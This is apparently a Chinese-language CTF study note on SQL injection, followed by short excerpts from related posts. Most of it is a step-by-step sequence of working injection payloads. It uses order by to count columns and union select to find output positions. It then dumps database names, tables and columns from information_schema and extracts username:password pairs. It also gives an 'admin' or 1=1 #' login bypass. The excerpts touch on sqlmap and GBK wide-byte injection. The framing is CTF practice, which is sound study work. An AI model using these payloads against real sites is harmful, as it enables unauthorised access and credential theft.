CTF SQL 注入 總結

2021-10-09 04:18:38 字數 3313 閱讀 1357

五、繞過

欄位回顯庫表

列flag

1.萬能密碼登陸

2.登陸後,使用聯合查詢注入

3.爆欄位

4.看回顯

4.爆資料庫

3.爆資料庫的表

4.爆出表的列

5.爆出flag

輸入框的#,直接使用hackbar位址列,需將#進行url編碼,即替換為%23

order by 爆欄位,到4報錯,有4-1,即3個字段

1' order by 1

#1' order by 2

#1' order by 3

#1' order by 4

#

union聯合查詢判斷回顯,在哪顯示資料,就在哪替換命令

1' union select 1,2

,3#

爆庫

1' union select 1,2

,version(

)#

version

1' union select 1,2

,database(

)#

database,database1

爆庫的表

只有乙個資料庫,省事直接相等

1' union select 1,2

,group_concat(table_name)

from information_schema.tables where table_schema=database(

)#

多個資料庫,選擇乙個

1

' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='database'

aaa,bbb,ccc

爆庫表的列

1

' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='aaa' #

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='bbb' #

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ccc' #

id,username,password

讀取內容,爆flag

1' union select 1,2

,group_concat(

id,username,password)

from aaa #

id,username,password

1' union select 1,2

,group_concat(username,

0x3a

,password)

from aaa#

username:password,username:password

精簡版

爆欄位

1' order by 1

#1' order by 2

#1' order by 3

#

1' order by 1%23

1' order by 2%23

1' order by 3

%23

看回顯

1' union select 1,2

,3#

爆資料庫

1' union select 1

,database(

),version(

)#

database,version

5.爆資料庫的表

只有乙個資料庫,省事直接相等

1' union select 1,2

,group_concat(table_name)

from information_schema.tables where table_schema=database(

)#

多個資料庫,選擇乙個

1

' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='database'

aaa,bbb,ccc

6.爆出表的列

1

' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='aaa' #

7.讀取內容,爆flag

讀aaa表

1' union select 1,2

,group_concat(

id,username,password)

from aaa%

23&password=

1

可以加ascii碼方便區別

1' union select 1,2

,group_concat(username,

0x40

,password)

from aaa%

23&password=

1

萬能密碼

admin』 or 1=1 #

常見url編碼

#%23

常用ascii碼

0x3a

:0x40 @

快捷鍵ctrl + enter 執行

未完成待補充整理…

CTF SQL注入

sql注入思路 1.是否存在sql注入測試方法 1 使用單引號 2 sqlmap sqlmap.py u http 2.判斷過濾的字元 sql注入方式 1 單引號 2 or and 1 1 3 order by 猜測字段長度 與 繞過過濾 例 order by 1 sql繞過過濾方式 1 某一關鍵字...

CTF SQL注入知識點

select from user where username admin and password 123 infomation schema php input可以讀取沒有處理過的post資料。相較於 http raw post data而言,它給記憶體帶來的壓力較小,並且不需要特殊的php.i...

南郵ctf mysql 南郵CTF SQL注入題

南郵ctf sql注入題 題目 gbk sql injection 解析 1.判斷注入點 加入單引號發現被反斜槓轉移掉了,換乙個,看清題目,gbk,接下來利用寬位元組進行注入 2.使用 df 進行注入,emm報錯,於是加入老手段,and 1 1 23,ok,沒報錯,說明成功 3.繼續改引數,1 2時...